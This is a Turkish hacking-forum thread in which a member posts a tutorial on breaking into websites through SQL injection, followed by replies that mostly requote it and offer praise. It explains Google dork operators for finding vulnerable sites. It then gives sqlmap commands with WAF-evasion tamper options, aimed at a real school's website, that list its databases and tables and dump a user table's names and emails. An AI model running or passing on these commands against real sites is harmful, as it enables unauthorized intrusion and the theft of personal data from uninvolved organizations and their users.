SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı

OBT is HeRYerDe · 25 Ocak 2022

Hepinize Merhaba Değerli THT Üyeleri;

Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum.

Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD İle Hemen Site Hacklemeye Geçiyoruz,
Önce O Konuya Bir Göz Atın Derim.

Konu:
CMD İle SQL İnjection Hack [Windows]

Şimdi Başlayalım... [Amacımız Zarar Vermek Değil]

Dork Nedir;

bilişim sektöründe genelde sql açıklı siteleri bulmamıza yardımcı olurlar.

Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları gibi. Dorklar sizin yazdığınız kelimelerle aramalarınızı o kısıtlamada yapmanızı sağlar.
sql açıklı siteleri bulmak için işimize de yaramaktadı.

Özel google arama operatörleri :

Intitle

Intitle belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.(Header kısmındaki yazıdır bu ve sayfa açıklamasında yer alır)

Allintitle

Intitle’a benzer, ancak başlıkta belirtilen tüm terimleri arar.

Inurl

Belirtilen terimi url’de arar. Örneğin inurl: “login.php”.

Allinurl

Inurl ile aynı, ancak url’deki tüm terimleri arar.

filetype

Belirli dosya türlerini arar. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.

Ext

filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulur.

intext

Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“.

Allintext

intext’e benzer, ancak tüm terimlerin metinde bulunması için arama yapar.

Site

Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: turkhackteam.com

Kaynak: Dork Nedir

SQL Açıklı Site Bulmak;

Bir Sitenin SQL Açıklı Olup Olmadığını Anlamak İçin URL'nin Sonuna ' Koyabiliriz, İşaretimiz Koyulduktan Sonra Eğer Ki "Syntax" Hatası Alırız.

Bulduğumuz Bir Siteyle Devam Edelim, Benim Sitem https://www.htps.edu.hk/en/school.php?id=19

Bulduğum Siteye ' İşareti Koyunca Gelen Hata;

Kodları Girelim;

CMD'yi Açıp sqlmap'i Çalıştırıyoruz, Şimdi Başlayalım...

python sqlmap.py

Veritabanı Çekimi;

Database Çekimine Başlıyoruz... [Gelen Sorulara "Y" Diyerek Enterleyiniz]

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Tabloların Çekimi;

Şimdi Her Sitede "information_schema" Bulunur, Bu Sitenin Ayarlarını İçerir. (İşimiz Bulunmuyor)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity --tables

Kolonların Çekimi;

Evet Tablo İsimlerimiz Geldi; Şimdi Admin,Password Bilgilerinin Olduğu Tabloyu Tahmin Etmelisiniz. (Bu Sitede Yok, Örnek Veriyoruz)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr --columns

Dumplama İşlemi;

Evet; Bu Sitede Admin,Password Bilgileri Yok. Biz Var Sayalım Ve Devam Edelim, Şimdi Dumplama İşlemindeyiz.

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr -C usr_name,usr_email --dump

Evet Böyle Bir Sonuçla Karşılaştık, SQL Açığı İle Site Hacklemeyi Öğrenmiş Olduk.

Okuduğunuz İçin Teşekkürler, Aklınıza Takılan Soruları Yazabilirsiniz.

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Baznx · 28 Ocak 2022

Güzel konu

UZAY 52 · 28 Ocak 2022

OBT is HeRYerDe' Alıntı:
Hepinize Merhaba Değerli THT Üyeleri;

Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum.

Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD İle Hemen Site Hacklemeye Geçiyoruz,
Önce O Konuya Bir Göz Atın Derim.

Konu:
CMD İle SQL İnjection Hack [Windows]

Şimdi Başlayalım... [Amacımız Zarar Vermek Değil]

Dork Nedir;

bilişim sektöründe genelde sql açıklı siteleri bulmamıza yardımcı olurlar.

Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları gibi. Dorklar sizin yazdığınız kelimelerle aramalarınızı o kısıtlamada yapmanızı sağlar.
sql açıklı siteleri bulmak için işimize de yaramaktadı.

Özel google arama operatörleri :

Intitle

Intitle belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.(Header kısmındaki yazıdır bu ve sayfa açıklamasında yer alır)

Allintitle

Intitle’a benzer, ancak başlıkta belirtilen tüm terimleri arar.

Inurl

Belirtilen terimi url’de arar. Örneğin inurl: “login.php”.

Allinurl

Inurl ile aynı, ancak url’deki tüm terimleri arar.

filetype

Belirli dosya türlerini arar. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.

Ext

filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulur.

intext

Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“.

Allintext

intext’e benzer, ancak tüm terimlerin metinde bulunması için arama yapar.

Site

Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: turkhackteam.com

Kaynak: Dork Nedir

SQL Açıklı Site Bulmak;

Bir Sitenin SQL Açıklı Olup Olmadığını Anlamak İçin URL'nin Sonuna ' Koyabiliriz, İşaretimiz Koyulduktan Sonra Eğer Ki "Syntax" Hatası Alırız.

Bulduğumuz Bir Siteyle Devam Edelim, Benim Sitem https://www.htps.edu.hk/en/school.php?id=19

Bulduğum Siteye ' İşareti Koyunca Gelen Hata;

Kodları Girelim;

CMD'yi Açıp sqlmap'i Çalıştırıyoruz, Şimdi Başlayalım...

python sqlmap.py

Veritabanı Çekimi;

Database Çekimine Başlıyoruz... [Gelen Sorulara "Y" Diyerek Enterleyiniz]

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Tabloların Çekimi;

Şimdi Her Sitede "information_schema" Bulunur, Bu Sitenin Ayarlarını İçerir. (İşimiz Bulunmuyor)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity --tables

Kolonların Çekimi;

Evet Tablo İsimlerimiz Geldi; Şimdi Admin,Password Bilgilerinin Olduğu Tabloyu Tahmin Etmelisiniz. (Bu Sitede Yok, Örnek Veriyoruz)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr --columns

Dumplama İşlemi;

Evet; Bu Sitede Admin,Password Bilgileri Yok. Biz Var Sayalım Ve Devam Edelim, Şimdi Dumplama İşlemindeyiz.

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr -C usr_name,usr_email --dump

Evet Böyle Bir Sonuçla Karşılaştık, SQL Açığı İle Site Hacklemeyi Öğrenmiş Olduk.

Okuduğunuz İçin Teşekkürler, Aklınıza Takılan Soruları Yazabilirsiniz.

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Elinize sağlık

D3DS3C · 28 Ocak 2022

bunu yapmadan once sitenin admin panelini bulun vaktiniz bosa gitmesin.

'The Wolf · 28 Ocak 2022

Eline sağlık OBT.

R1Px · 28 Ocak 2022

OBT is HeRYerDe' Alıntı:
Hepinize Merhaba Değerli THT Üyeleri;

Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum.

Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD İle Hemen Site Hacklemeye Geçiyoruz,
Önce O Konuya Bir Göz Atın Derim.

Konu:
CMD İle SQL İnjection Hack [Windows]

Şimdi Başlayalım... [Amacımız Zarar Vermek Değil]

Dork Nedir;

bilişim sektöründe genelde sql açıklı siteleri bulmamıza yardımcı olurlar.

Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları gibi. Dorklar sizin yazdığınız kelimelerle aramalarınızı o kısıtlamada yapmanızı sağlar.
sql açıklı siteleri bulmak için işimize de yaramaktadı.

Özel google arama operatörleri :

Intitle

Intitle belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.(Header kısmındaki yazıdır bu ve sayfa açıklamasında yer alır)

Allintitle

Intitle’a benzer, ancak başlıkta belirtilen tüm terimleri arar.

Inurl

Belirtilen terimi url’de arar. Örneğin inurl: “login.php”.

Allinurl

Inurl ile aynı, ancak url’deki tüm terimleri arar.

filetype

Belirli dosya türlerini arar. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.

Ext

filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulur.

intext

Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“.

Allintext

intext’e benzer, ancak tüm terimlerin metinde bulunması için arama yapar.

Site

Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: turkhackteam.com

Kaynak: Dork Nedir

SQL Açıklı Site Bulmak;

Bir Sitenin SQL Açıklı Olup Olmadığını Anlamak İçin URL'nin Sonuna ' Koyabiliriz, İşaretimiz Koyulduktan Sonra Eğer Ki "Syntax" Hatası Alırız.

Bulduğumuz Bir Siteyle Devam Edelim, Benim Sitem https://www.htps.edu.hk/en/school.php?id=19

Bulduğum Siteye ' İşareti Koyunca Gelen Hata;

Kodları Girelim;

CMD'yi Açıp sqlmap'i Çalıştırıyoruz, Şimdi Başlayalım...

python sqlmap.py

Veritabanı Çekimi;

Database Çekimine Başlıyoruz... [Gelen Sorulara "Y" Diyerek Enterleyiniz]

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Tabloların Çekimi;

Şimdi Her Sitede "information_schema" Bulunur, Bu Sitenin Ayarlarını İçerir. (İşimiz Bulunmuyor)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity --tables

Kolonların Çekimi;

Evet Tablo İsimlerimiz Geldi; Şimdi Admin,Password Bilgilerinin Olduğu Tabloyu Tahmin Etmelisiniz. (Bu Sitede Yok, Örnek Veriyoruz)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr --columns

Dumplama İşlemi;

Evet; Bu Sitede Admin,Password Bilgileri Yok. Biz Var Sayalım Ve Devam Edelim, Şimdi Dumplama İşlemindeyiz.

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr -C usr_name,usr_email --dump

Evet Böyle Bir Sonuçla Karşılaştık, SQL Açığı İle Site Hacklemeyi Öğrenmiş Olduk.

Okuduğunuz İçin Teşekkürler, Aklınıza Takılan Soruları Yazabilirsiniz.

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Ellerine Emeğine Sağlık Çok Güzel Bir Anlatım Olmuş Gayet Yararlı Konu. İyi Forumlar Dilerim.

CiHaN-i TuRaN · 28 Ocak 2022

Eline sağlık

OBT is HeRYerDe · 28 Ocak 2022

Baznx' Alıntı:
Güzel konu

Teşekkürler...

UZAY 52' Alıntı:
Elinize sağlık

Teşekkürler...

D3DS3C' Alıntı:
bunu yapmadan once sitenin admin panelini bulun vaktiniz bosa gitmesin.

Hocam Haklı, Önce Bunu Yapmalıyız.

'The Wolf' Alıntı:
Eline sağlık OBT.

Teşekkürler Hocam.

R1Px' Alıntı:
Ellerine Emeğine Sağlık Çok Güzel Bir Anlatım Olmuş Gayet Yararlı Konu. İyi Forumlar Dilerim.

Sağol Dostum, İyi Forumlar.

CiHaN-i TuRaN' Alıntı:
Eline sağlık

Teşekkürler Hocam.

R1Px · 28 Ocak 2022

Herkese Hocam Demişsin Bana DOSTUM

Teşekkür Ederim

The Gölge · 31 Ocak 2022

OBT is HeRYerDe' Alıntı:
Hepinize Merhaba Değerli THT Üyeleri;

Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum.

Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD İle Hemen Site Hacklemeye Geçiyoruz,
Önce O Konuya Bir Göz Atın Derim.

Konu:
CMD İle SQL İnjection Hack [Windows]

Şimdi Başlayalım... [Amacımız Zarar Vermek Değil]

Dork Nedir;

bilişim sektöründe genelde sql açıklı siteleri bulmamıza yardımcı olurlar.

Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları gibi. Dorklar sizin yazdığınız kelimelerle aramalarınızı o kısıtlamada yapmanızı sağlar.
sql açıklı siteleri bulmak için işimize de yaramaktadı.

Özel google arama operatörleri :

Intitle

Intitle belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.(Header kısmındaki yazıdır bu ve sayfa açıklamasında yer alır)

Allintitle

Intitle’a benzer, ancak başlıkta belirtilen tüm terimleri arar.

Inurl

Belirtilen terimi url’de arar. Örneğin inurl: “login.php”.

Allinurl

Inurl ile aynı, ancak url’deki tüm terimleri arar.

filetype

Belirli dosya türlerini arar. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.

Ext

filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulur.

intext

Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“.

Allintext

intext’e benzer, ancak tüm terimlerin metinde bulunması için arama yapar.

Site

Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: turkhackteam.com

Kaynak: Dork Nedir

SQL Açıklı Site Bulmak;

Bir Sitenin SQL Açıklı Olup Olmadığını Anlamak İçin URL'nin Sonuna ' Koyabiliriz, İşaretimiz Koyulduktan Sonra Eğer Ki "Syntax" Hatası Alırız.

Bulduğumuz Bir Siteyle Devam Edelim, Benim Sitem https://www.htps.edu.hk/en/school.php?id=19

Bulduğum Siteye ' İşareti Koyunca Gelen Hata;

Kodları Girelim;

CMD'yi Açıp sqlmap'i Çalıştırıyoruz, Şimdi Başlayalım...

python sqlmap.py

Veritabanı Çekimi;

Database Çekimine Başlıyoruz... [Gelen Sorulara "Y" Diyerek Enterleyiniz]

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Tabloların Çekimi;

Şimdi Her Sitede "information_schema" Bulunur, Bu Sitenin Ayarlarını İçerir. (İşimiz Bulunmuyor)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity --tables

Kolonların Çekimi;

Evet Tablo İsimlerimiz Geldi; Şimdi Admin,Password Bilgilerinin Olduğu Tabloyu Tahmin Etmelisiniz. (Bu Sitede Yok, Örnek Veriyoruz)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr --columns

Dumplama İşlemi;

Evet; Bu Sitede Admin,Password Bilgileri Yok. Biz Var Sayalım Ve Devam Edelim, Şimdi Dumplama İşlemindeyiz.

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr -C usr_name,usr_email --dump

Evet Böyle Bir Sonuçla Karşılaştık, SQL Açığı İle Site Hacklemeyi Öğrenmiş Olduk.

Okuduğunuz İçin Teşekkürler, Aklınıza Takılan Soruları Yazabilirsiniz.

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Eline sağlık dostum güzel bir konuya değinmişsin eline emeğine sağlık

KensTagia · 18 Kas 2022

Ben şimdi kali yokken cmd den yapabilir iyim?

OBT is HeRYerDe · 18 Kas 2022

The Golge' Alıntı:
Eline sağlık dostum güzel bir konuya değinmişsin eline emeğine sağlık

Sağolun Hocam. (geç oldu ama)

KensTagia' Alıntı:
Ben şimdi kali yokken cmd den yapabilir iyim?

Evet, Yapabilirsiniz.

KensTagia · 18 Kas 2022

OBT is HeRYerDe' Alıntı:
Sağolun Hocam. (geç oldu ama)

Evet, Yapabilirsiniz.

Teşekkürler cevabın için
Konuda mükemmel olmuş eline sağlık

OBT is HeRYerDe · 18 Kas 2022

KensTagia' Alıntı:
Teşekkürler cevabın için
Konuda mükemmel olmuş eline sağlık

Sağol Dostum.

Extazİ · 18 Kas 2022

Eline sağlık.

THE zoRRo · 18 Kas 2022

OBT is HeRYerDe' Alıntı:
Hepinize Merhaba Değerli THT Üyeleri;

Forumda "Site Nasıl Hacklenir / Site Hackleme Yolları" Gibi Çok Fazla Konu Açılıyor, Ben De En Kolay Site Hackleme Yöntemini Sizlere Sunuyorum.

Daha Önceden 'sqlmap' Aracından Bahsetmiş; Nasıl Kurulacağını, Nasıl Kullanılacağından vb. Anlatmıştım. Biz CMD İle Hemen Site Hacklemeye Geçiyoruz,
Önce O Konuya Bir Göz Atın Derim.

Konu:
CMD İle SQL İnjection Hack [Windows]

Şimdi Başlayalım... [Amacımız Zarar Vermek Değil]

Dork Nedir;

bilişim sektöründe genelde sql açıklı siteleri bulmamıza yardımcı olurlar.

Dorkların çeşitleri vardır örneğin wordpress dorkları joomla dorkları sql dorkları gibi. Dorklar sizin yazdığınız kelimelerle aramalarınızı o kısıtlamada yapmanızı sağlar.
sql açıklı siteleri bulmak için işimize de yaramaktadı.

Özel google arama operatörleri :

Intitle

Intitle belirterek, google’a yalnızca html başlıklarındaki terimleri içeren sayfaları göstermesini söyleyebilirsiniz. Örneğin intitle: “login page“, başlık metninde “login page“ terimine sahip olan sayfaları gösterir.(Header kısmındaki yazıdır bu ve sayfa açıklamasında yer alır)

Allintitle

Intitle’a benzer, ancak başlıkta belirtilen tüm terimleri arar.

Inurl

Belirtilen terimi url’de arar. Örneğin inurl: “login.php”.

Allinurl

Inurl ile aynı, ancak url’deki tüm terimleri arar.

filetype

Belirli dosya türlerini arar. “Filetype: pdf” web sitelerindeki pdf dosyalarını arar. Benzer şekilde “filetype: txt”, .txt uzantılı dosyaları arar.

Ext

filetype’a benzer. “Ext: pdf” pdf uzantı dosyalarını bulur.

intext

Sayfa içeriğini aramaya yarar. Basit bir google araması gibi. Örneğin; intext:”index of /“.

Allintext

intext’e benzer, ancak tüm terimlerin metinde bulunması için arama yapar.

Site

Aramayı yalnızca belirli bir siteyle sınırlandırır. Site: turkhackteam.com

Kaynak: Dork Nedir

SQL Açıklı Site Bulmak;

Bir Sitenin SQL Açıklı Olup Olmadığını Anlamak İçin URL'nin Sonuna ' Koyabiliriz, İşaretimiz Koyulduktan Sonra Eğer Ki "Syntax" Hatası Alırız.

Bulduğumuz Bir Siteyle Devam Edelim, Benim Sitem https://www.htps.edu.hk/en/school.php?id=19

Bulduğum Siteye ' İşareti Koyunca Gelen Hata;

Kodları Girelim;

CMD'yi Açıp sqlmap'i Çalıştırıyoruz, Şimdi Başlayalım...

python sqlmap.py

Veritabanı Çekimi;

Database Çekimine Başlıyoruz... [Gelen Sorulara "Y" Diyerek Enterleyiniz]

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" --dbs

Tabloların Çekimi;

Şimdi Her Sitede "information_schema" Bulunur, Bu Sitenin Ayarlarını İçerir. (İşimiz Bulunmuyor)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity --tables

Kolonların Çekimi;

Evet Tablo İsimlerimiz Geldi; Şimdi Admin,Password Bilgilerinin Olduğu Tabloyu Tahmin Etmelisiniz. (Bu Sitede Yok, Örnek Veriyoruz)

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr --columns

Dumplama İşlemi;

Evet; Bu Sitede Admin,Password Bilgileri Yok. Biz Var Sayalım Ve Devam Edelim, Şimdi Dumplama İşlemindeyiz.

python sqlmap.py -u https://www.htps.edu.hk/en/school.php?id=19 --random-agent -v3 --tamper="between,randomcase,space2comment" -D holytrinity -T usr -C usr_name,usr_email --dump

Evet Böyle Bir Sonuçla Karşılaştık, SQL Açığı İle Site Hacklemeyi Öğrenmiş Olduk.

Okuduğunuz İçin Teşekkürler, Aklınıza Takılan Soruları Yazabilirsiniz.

ᴏʙᴛ ɪs ʜᴇʀʏᴇʀᴅᴇ

Ellerine sağlık.

KensTagia · 18 Kas 2022

@OBT is HeRYerDe
hocam ben cmd açıp dediniz python sqlmap.py kodunuz yazdım ama python bulunamadı yazısı geldi şimdi ne yapmalıyım?

OBT is HeRYerDe · 18 Kas 2022

𝕫𝕠ℝℝ𝕠' Alıntı:
Ellerine sağlık.

Teşekkürler.

KensTagia' Alıntı:
@OBT is HeRYerDe
hocam ben cmd açıp dediniz python sqlmap.py kodunuz yazdım ama python bulunamadı yazısı geldi şimdi ne yapmalıyım?

Merhaba, Buradan Gerekli Dosyaları İndiriniz.

https://www.turkhackteam.org/konular/cmd-ile-sql-injection-hack-windows-site-hackleme-obt-is-heryerde.2005738/

The Gölge · 18 Kas 2022

OBT is HeRYerDe' Alıntı:
Sağolun Hocam. (geç oldu ama)

Evet, Yapabilirsiniz.

Estağfurullah canım

El Petr · 18 Kas 2022

eline sağlık

SQL Açığı İle Site Hacklemek [Windows] - Uygulamalı

Anka Team

Üye

Uzman üye

Uzman üye

Kıdemli Üye

Üye

Kıdemli Üye

Anka Team

Üye

Saldırı Timleri Emektar

Üye

Anka Team

Üye

Anka Team

Moderatör

Uzman üye

Üye

Anka Team

Saldırı Timleri Emektar

Uzman üye